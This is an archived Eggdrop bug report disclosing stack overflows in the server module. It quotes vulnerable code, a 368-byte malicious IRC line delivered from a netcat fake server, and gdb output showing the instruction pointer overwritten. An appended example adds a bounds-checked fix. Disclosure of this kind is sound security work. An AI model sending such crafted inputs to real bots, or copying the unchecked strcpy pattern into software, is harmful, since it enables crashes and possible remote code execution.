Eggdev: [Bug 462] New: multiple buffer overflows in server module

bugzilla-daemon at tsss.org bugzilla-daemon at tsss.org
Thu Apr 19 20:56:41 CST 2007


http://www.eggheads.org/bugzilla/show_bug.cgi?id=462

           Summary: multiple buffer overflows in server module
           Product: Eggdrop 1.6
           Version: 1.6.18
          Platform: PC
        OS/Version: All
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Module: server.mod
        AssignedTo: eggdev at eggheads.org
        ReportedBy: bow.sineath at gmail.com


This email was sent to bugs@ several days ago; I thought it was worth posting
here. I searched and didn't see where anyone else had reported it
(surprisingly). Here goes:

I was taking a quick look at some of the code behind the eggie server module and
I ran across a few stack based overflows. I am incredibly surprised that no one
has reported these yet.

It seems that you are relying on the fact that the server the bot is connected
to is sane and not malicious, but I was able to exploit these flaws by opening a
netcat listener and connecting the bot to it, then sending whatever string I
needed to.

For example:

static int gotmsg(char *from, char *msg)
{
  char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
       *p, *p1, *code;

........

  ignoring = match_ignore(from);
  to = newsplit(&msg);
  fixcolon(msg);
  /* Only check if flood-ctcp is active */
  strcpy(uhost, from);

By sending the following string:

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test

(that's 368 bytes)

gdb output:

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 14990]
0x42424242 in ?? ()
(gdb) i r $eip
eip            0x42424242       0x42424242

You overwrite the instruction pointer with 0x42424242. It should be obvious that
this could allow remote code execution as well. I didn't spend too much time
looking at the rest of the code; this just happened to catch my eye while I was
glancing over it. I did notice a few others that were along the same lines as
this, but I didn't test them or document them, although I would be happy to do
so if you want more information.

Given the fact that you have to convince someone to connect to a malicious
server, this isn't -THAT- serious, but if someone had the proper console
permissions or was able to coerce someone to connect their eggdrop to a 
malicious server, then it could result in a compromise.
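As an added example (not code from the report or from eggdrop itself): a bounded version of the prefix copy described above, in which a server prefix that does not fit the fixed UHOSTLEN stack buffer is rejected instead of being copied over the return address. The UHOSTLEN value and the function names are assumptions for illustration.

```c
#include <string.h>
/* Assumed for illustration; eggdrop's real UHOSTLEN is in its headers, not on this page. */
#define UHOSTLEN 160

/* Bounded counterpart of the report's unchecked strcpy(uhost, from):
 * returns 0 on success, -1 when `src` would not fit in dst[dst_size]. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;               /* too long: refuse rather than overrun */
    memcpy(dst, src, len + 1);   /* len + 1 includes the terminating NUL */
    return 0;
}

/* Handle one raw server line ":<prefix> <rest>". The prefix is what gotmsg()
 * sees as `from`; it goes into a UHOSTLEN stack buffer only if it fits.
 * Returns 0 if the line is accepted, -1 if it is rejected. */
int handle_server_line(const char *line, char *rest_out, size_t rest_size)
{
    char buf[UHOSTLEN];          /* same fixed-size stack buffer as uhost */
    const char *sp;
    size_t plen;
    if (line[0] != ':' || (sp = strchr(line, ' ')) == NULL)
        return -1;               /* not the ":prefix rest" shape handled here */
    plen = (size_t)(sp - (line + 1));
    if (plen >= sizeof buf)
        return -1;               /* the reported over-long prefix stops here */
    memcpy(buf, line + 1, plen);
    buf[plen] = '\0';
    return copy_bounded(rest_out, rest_size, sp + 1);
}

/* Constructed inputs: a normal line, and one whose prefix is 368 'A's as in
 * the report (plain filler only). Return values come from handle_server_line. */
int demo_normal(void)
{
    char rest[128];
    return handle_server_line(":nick!user@host PRIVMSG Lamestbot :test", rest, sizeof rest);
}

int demo_overlong(void)
{
    char line[512], rest[128];   /* line[] is sized to hold the whole test input */
    line[0] = ':';
    memset(line + 1, 'A', 368);
    strcpy(line + 369, " PRIVMSG Lamestbot :test");
    return handle_server_line(line, rest, sizeof rest);
}
```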


